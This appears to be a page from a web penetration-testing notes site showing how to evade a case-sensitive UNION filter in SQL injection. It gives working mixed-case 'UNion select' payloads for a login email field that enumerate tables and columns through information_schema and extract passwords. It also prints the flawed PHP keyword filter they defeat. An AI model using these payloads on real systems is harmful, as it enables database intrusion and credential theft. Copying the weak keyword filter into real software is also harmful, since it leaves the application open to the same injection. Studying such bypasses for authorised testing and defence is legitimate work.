Bypassing SQL Filters

UNION Filters

Lets say we are testing a login form and it returns an error whenever we try to execute UNION SELECT. This suggest that there is a WAF filtering the queries so we would use Union instead.

Email=’ UNion select 1,2,3,concat(command,
"@test.com") -- -

Email=' UNion select
1,2,3,concat(table_name, "@test.com") FROM
information_schema.tables where
table_schema="databasename" limit 1,1 -- -

Email=' UNion select
1,2,3,concat(column_name, "@test.com")
FROM information_schema.columns where
table_name="tablename" limit 2,1 -- -

Email= ' UNion select
1,2,3,concat(password, “@test.com”) FROM
tablename limit 1,1 -- -

You can also use [GROUP_CONCAT] instead of [concat] as it combines entire column in one result.

[union] filter is below:

if(strpos($user,"UNION") ||
strpos($user,"INFORMATION_SCHEMA") ||
strpos($user,"union") ) { 
echo "Error"; die; 
}

Notice that the filter prohibits [“UNION”, “INFORMATION_SCHEMA”, and “union”] as characters hence if you modify on the [union] command a bit you can easily bypass it.

PreviousTime based SQL Injection Blind NextSQL Injection with sqlmap

Last updated 12 months ago